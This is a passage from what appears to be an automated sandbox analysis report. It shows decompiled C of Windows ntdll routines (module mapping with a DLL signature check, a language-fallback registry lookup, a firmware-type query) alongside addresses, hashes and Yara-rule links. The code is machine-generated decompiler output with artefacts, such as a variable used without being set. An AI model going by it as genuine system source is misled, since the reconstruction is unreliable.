							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01907D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01967016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01907D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01907D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01967016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0191A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E018EB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                              0x018f7e4c
                                              0x018f7e50
                                              0x018f7e55
                                              0x018f7e58
                                              0x018f7e5d
                                              0x018f7e71
                                              0x018f7f33
                                              0x018f7e77
                                              0x018f7e77
                                              0x018f7e79
                                              0x018f7e79
                                              0x018f7e7e
                                              0x018f7f45
                                              0x01949848
                                              0x00000000
                                              0x01949848
                                              0x018f7f4e
                                              0x018f7f53
                                              0x018f7f5a
                                              0x00000000
                                              0x00000000
                                              0x0194985a
                                              0x01949862
                                              0x01949866
                                              0x00000000
                                              0x0194986c
                                              0x00000000
                                              0x0194986c
                                              0x018f7e84
                                              0x018f7e84
                                              0x018f7e8d
                                              0x01949871
                                              0x018f7eb8
                                              0x018f7ec0
                                              0x018f7ec0
                                              0x018f7e9a
                                              0x0194987e
                                              0x00000000
                                              0x00000000
                                              0x01949884
                                              0x0194988b
                                              0x019498a7
                                              0x019498ac
                                              0x019498b1
                                              0x019498b6
                                              0x019498b8
                                              0x019498b8
                                              0x019498b9
                                              0x00000000
                                              0x019498b9
                                              0x018f7ea0
                                              0x018f7ea7
                                              0x00000000
                                              0x00000000
                                              0x018f7eac
                                              0x018f7eb1
                                              0x018f7ec6
                                              0x018f7ed0
                                              0x019498cc
                                              0x018f7ed6
                                              0x018f7ed6
                                              0x018f7ed6
                                              0x018f7ede
                                              0x018f7ee3
                                              0x019498e3
                                              0x019498f0
                                              0x01949902
                                              0x019498f2
                                              0x019498fb
                                              0x019498fb
                                              0x01949907
                                              0x0194991d
                                              0x0194991d
                                              0x01949907
                                              0x019498e3
                                              0x018f7ef0
                                              0x018f7f14
                                              0x018f7f14
                                              0x018f7f1e
                                              0x01949946
                                              0x018f7f24
                                              0x018f7f24
                                              0x018f7f24
                                              0x018f7f2c
                                              0x0194996a
                                              0x01949975
                                              0x01949975
                                              0x0194997e
                                              0x01949993
                                              0x01949993
                                              0x0194997e
                                              0x00000000
                                              0x018f7ef2
                                              0x018f7efc
                                              0x018f7f0a
                                              0x018f7f0e
                                              0x01949933
                                              0x00000000
                                              0x01949933
                                              0x00000000
                                              0x018f7f0e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x018f7eb1

                                              Strings
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 01949891
                                              • LdrpCompleteMapModule, xrefs: 01949898
                                              • minkernel\ntdll\ldrmap.c, xrefs: 019498A2
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: b4bc3b9eefd3272cc45dd150a22ae1997f2b5ce56810f99631e5cf0b78890533
                                              • Instruction ID: 62ed30e306e25240851a4a8c7c2128eb7f1bb9550f7c99df43b9c0df7a3af753
                                              • Opcode Fuzzy Hash: b4bc3b9eefd3272cc45dd150a22ae1997f2b5ce56810f99631e5cf0b78890533
                                              • Instruction Fuzzy Hash: CC51DF316007469BF726CF6CC944F2A7BE4AB45B18F1405AEEA55DB3D2D734EA00C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018EE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E018EE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E018EF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E019295D0();
						}
						if(_t78 != 0) {
							L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0192FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0192BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01929600();
					if(_t97 < 0) {
						goto L6;
					}
					E0192BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L018EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0192BB40(_t83, _t102 + 0x24, _t78);
								if(L018F43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0192BB40(_t84, _t102 + 0x24, _t94);
									if(L018F43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                              0x018ee620
                                              0x018ee628
                                              0x018ee62f
                                              0x018ee631
                                              0x018ee635
                                              0x018ee637
                                              0x018ee63e
                                              0x01945503
                                              0x01945503
                                              0x018ee64c
                                              0x018ee64c
                                              0x018ee651
                                              0x00000000
                                              0x00000000
                                              0x018ee661
                                              0x018ee665
                                              0x0194542a
                                              0x018ee715
                                              0x018ee71a
                                              0x018ee71c
                                              0x018ee720
                                              0x018ee720
                                              0x018ee727
                                              0x018ee736
                                              0x018ee736
                                              0x018ee743
                                              0x018ee743
                                              0x018ee673
                                              0x018ee678
                                              0x018ee67d
                                              0x018ee682
                                              0x018ee685
                                              0x018ee692
                                              0x018ee69b
                                              0x018ee6a3
                                              0x018ee6ad
                                              0x018ee6b1
                                              0x018ee6b2
                                              0x018ee6bb
                                              0x018ee6bf
                                              0x018ee6c0
                                              0x018ee6c8
                                              0x018ee6cc
                                              0x018ee6d5
                                              0x018ee6d9
                                              0x00000000
                                              0x00000000
                                              0x018ee6e5
                                              0x018ee6ea
                                              0x018ee6f9
                                              0x018ee70b
                                              0x018ee70f
                                              0x01945439
                                              0x0194545e
                                              0x0194545e
                                              0x00000000
                                              0x0194545e
                                              0x0194543b
                                              0x0194543e
                                              0x01945440
                                              0x01945445
                                              0x01945472
                                              0x01945475
                                              0x0194548d
                                              0x01945493
                                              0x019454a9
                                              0x00000000
                                              0x00000000
                                              0x019454ab
                                              0x019454b4
                                              0x019454bc
                                              0x019454c8
                                              0x019454de
                                              0x019454fb
                                              0x019454e0
                                              0x019454e6
                                              0x019454eb
                                              0x019454eb
                                              0x019454de
                                              0x00000000
                                              0x019454bc
                                              0x01945477
                                              0x0194547a
                                              0x01945480
                                              0x01945483
                                              0x01945486
                                              0x0194548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0194548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x01945447
                                              0x01945447
                                              0x01945447
                                              0x01945447
                                              0x0194544e
                                              0x00000000
                                              0x00000000
                                              0x01945450
                                              0x01945452
                                              0x01945455
                                              0x0194545a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0194545c
                                              0x0194546a
                                              0x0194546d
                                              0x0194546f
                                              0x00000000
                                              0x0194546f
                                              0x018ee70f

                                              Strings
                                              • @, xrefs: 018EE6C0
                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 018EE68C
                                              • InstallLanguageFallback, xrefs: 018EE6DB
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                              • API String ID: 0-1757540487
                                              • Opcode ID: 2d33d0de909ab38f79edd7c7b8fd939adf9d63cb306f4e4bcd0a3286617be18b
                                              • Instruction ID: b748a74847807429204f3c7dc319eb4c78cb88705ab14ba33dc0f303df7a31be
                                              • Opcode Fuzzy Hash: 2d33d0de909ab38f79edd7c7b8fd939adf9d63cb306f4e4bcd0a3286617be18b
                                              • Instruction Fuzzy Hash: DD51D3766043169BE714DF68C844E6BB7E8BF89B15F05092EFA89D7240F734DA04C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019AE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 60%
                                              			E019AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E019ABBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E019ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E019AAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01929730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E019AA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E019AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01929730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E019AA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E019AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01902280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E018FB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E018FFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01907D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0199FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                              0x019ae547
                                              0x019ae549
                                              0x019ae54f
                                              0x019ae553
                                              0x019ae557
                                              0x019ae55a
                                              0x019ae55c
                                              0x019ae55f
                                              0x019ae561
                                              0x019ae567
                                              0x019ae56b
                                              0x019ae7e2
                                              0x00000000
                                              0x019ae571
                                              0x019ae575
                                              0x019ae577
                                              0x019ae57b
                                              0x019ae57c
                                              0x019ae57d
                                              0x019ae57e
                                              0x019ae57f
                                              0x019ae588
                                              0x019ae58f
                                              0x019ae591
                                              0x019ae592
                                              0x019ae592
                                              0x019ae596
                                              0x019ae59e
                                              0x019ae5a0
                                              0x019ae5a6
                                              0x019ae61d
                                              0x019ae61d
                                              0x019ae621
                                              0x019ae623
                                              0x019ae630
                                              0x019ae630
                                              0x019ae7e6
                                              0x019ae7eb
                                              0x019ae7ed
                                              0x019ae7f4
                                              0x019ae7fa
                                              0x019ae7ff
                                              0x019ae7ff
                                              0x019ae80a
                                              0x019ae812
                                              0x019ae812
                                              0x019ae5ab
                                              0x019ae5b4
                                              0x019ae5b9
                                              0x019ae5be
                                              0x019ae5c0
                                              0x019ae5c2
                                              0x019ae5c8
                                              0x019ae5c9
                                              0x019ae5cb
                                              0x019ae5cc
                                              0x019ae5d5
                                              0x019ae5e4
                                              0x019ae5f1
                                              0x019ae5f8
                                              0x019ae5f8
                                              0x019ae5d5
                                              0x019ae602
                                              0x019ae616
                                              0x019ae63d
                                              0x019ae644
                                              0x019ae64d
                                              0x019ae652
                                              0x019ae657
                                              0x019ae659
                                              0x019ae65b
                                              0x019ae661
                                              0x019ae662
                                              0x019ae664
                                              0x019ae665
                                              0x019ae66e
                                              0x019ae67d
                                              0x019ae68a
                                              0x019ae691
                                              0x019ae691
                                              0x019ae66e
                                              0x019ae6b0
                                              0x00000000
                                              0x019ae6b6
                                              0x019ae6bd
                                              0x019ae6c7
                                              0x019ae6d7
                                              0x019ae6d9
                                              0x019ae6db
                                              0x019ae6de
                                              0x019ae6e3
                                              0x019ae6f3
                                              0x019ae6fc
                                              0x019ae700
                                              0x019ae700
                                              0x019ae704
                                              0x019ae70a
                                              0x019ae70a
                                              0x019ae713
                                              0x019ae716
                                              0x019ae719
                                              0x019ae720
                                              0x019ae761
                                              0x019ae76b
                                              0x019ae774
                                              0x019ae77a
                                              0x019ae77a
                                              0x019ae78a
                                              0x019ae791
                                              0x019ae799
                                              0x019ae79b
                                              0x019ae79f
                                              0x019ae7aa
                                              0x019ae7c0
                                              0x019ae7ac
                                              0x019ae7b2
                                              0x019ae7b9
                                              0x019ae7b9
                                              0x019ae7c7
                                              0x019ae806
                                              0x00000000
                                              0x019ae7c9
                                              0x019ae7d1
                                              0x019ae7d8
                                              0x00000000
                                              0x019ae7d8
                                              0x00000000
                                              0x00000000
                                              0x019ae722
                                              0x019ae72e
                                              0x019ae748
                                              0x019ae74c
                                              0x019ae754
                                              0x019ae756
                                              0x019ae75c
                                              0x019ae75c
                                              0x00000000
                                              0x019ae75c
                                              0x019ae758
                                              0x019ae758
                                              0x00000000
                                              0x019ae758
                                              0x019ae750
                                              0x00000000
                                              0x00000000
                                              0x019ae752
                                              0x00000000
                                              0x019ae752
                                              0x019ae730
                                              0x019ae735
                                              0x019ae73d
                                              0x019ae73f
                                              0x00000000
                                              0x00000000
                                              0x019ae741
                                              0x019ae741
                                              0x00000000
                                              0x019ae741
                                              0x019ae739
                                              0x00000000
                                              0x00000000
                                              0x019ae73b
                                              0x00000000
                                              0x019ae73b
                                              0x019ae722
                                              0x019ae720
                                              0x019ae6b0
                                              0x019ae618
                                              0x00000000
                                              0x019ae618

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction ID: fadee3e50c9157a2b2f7ff8f9c525d63a6108d197412ec29867939e7034e857c
                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction Fuzzy Hash: 43918F316043429FE725CE29C845B1BBBE9AFC4715F54892DF699CB280E774E908CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019651BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E019651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19c05f0);
				E0193D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E018FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E019653CA(0);
						return E0193D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0192F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01903690(1, _t117, 0x18c1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0192AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01904620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0192AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0196500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01929860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                              0x019651be
                                              0x019651c3
                                              0x019651c8
                                              0x019651cd
                                              0x019651d0
                                              0x019651d3
                                              0x019651d8
                                              0x019651db
                                              0x019651de
                                              0x019651e0
                                              0x019651e3
                                              0x019651e6
                                              0x019651e8
                                              0x01965342
                                              0x01965351
                                              0x01965356
                                              0x0196535a
                                              0x01965360
                                              0x01965363
                                              0x01965366
                                              0x01965369
                                              0x01965369
                                              0x0196536b
                                              0x0196536b
                                              0x01965370
                                              0x019653a3
                                              0x019653a4
                                              0x019653a6
                                              0x019653ab
                                              0x019653ab
                                              0x019653ae
                                              0x019653ae
                                              0x019653b5
                                              0x019653bf
                                              0x019653bf
                                              0x01965375
                                              0x01965396
                                              0x019653a0
                                              0x019653a0
                                              0x00000000
                                              0x01965396
                                              0x01965377
                                              0x01965379
                                              0x0196537f
                                              0x0196538c
                                              0x01965390
                                              0x00000000
                                              0x01965390
                                              0x019651ee
                                              0x019651f1
                                              0x01965301
                                              0x01965310
                                              0x01965315
                                              0x01965318
                                              0x0196531b
                                              0x01965320
                                              0x0196532e
                                              0x01965331
                                              0x00000000
                                              0x01965331
                                              0x01965328
                                              0x01965329
                                              0x00000000
                                              0x01965329
                                              0x019651fa
                                              0x01965235
                                              0x01965236
                                              0x01965239
                                              0x0196523f
                                              0x01965240
                                              0x01965241
                                              0x01965242
                                              0x01965246
                                              0x01965247
                                              0x0196524e
                                              0x01965251
                                              0x01965267
                                              0x01965269
                                              0x0196526e
                                              0x0196527d
                                              0x0196527e
                                              0x01965281
                                              0x01965282
                                              0x01965287
                                              0x01965288
                                              0x0196528a
                                              0x0196528f
                                              0x01965294
                                              0x00000000
                                              0x00000000
                                              0x0196529a
                                              0x0196529c
                                              0x0196529e
                                              0x0196529e
                                              0x019652a4
                                              0x019652b0
                                              0x00000000
                                              0x00000000
                                              0x019652ba
                                              0x019652bc
                                              0x019652bc
                                              0x019652d4
                                              0x019652d9
                                              0x019652dc
                                              0x019652e1
                                              0x00000000
                                              0x00000000
                                              0x019652e7
                                              0x019652f4
                                              0x00000000
                                              0x019652f4
                                              0x01965270
                                              0x00000000
                                              0x01965270
                                              0x019651fc
                                              0x019651fd
                                              0x01965202
                                              0x01965203
                                              0x01965205
                                              0x0196520a
                                              0x0196520f
                                              0x00000000
                                              0x00000000
                                              0x0196521b
                                              0x01965226
                                              0x0196522b
                                              0x0196521d
                                              0x0196521d
                                              0x01965222
                                              0x01965222
                                              0x0196522d
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: 6a9301f9b91f793b1b25e3f95a2af17c13b8cf9b6305817aaca67a383ff27440
                                              • Instruction ID: cf688324e3c5a479a7c06eba18ecc9ce9ae6caf161456344f37e4c6bbac81676
                                              • Opcode Fuzzy Hash: 6a9301f9b91f793b1b25e3f95a2af17c13b8cf9b6305817aaca67a383ff27440
                                              • Instruction Fuzzy Hash: 54515E71A00619DFEB15DFA9C980EAEBBF8FF44B40F15442DE64DEB251D6719900CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0190B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E0190B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
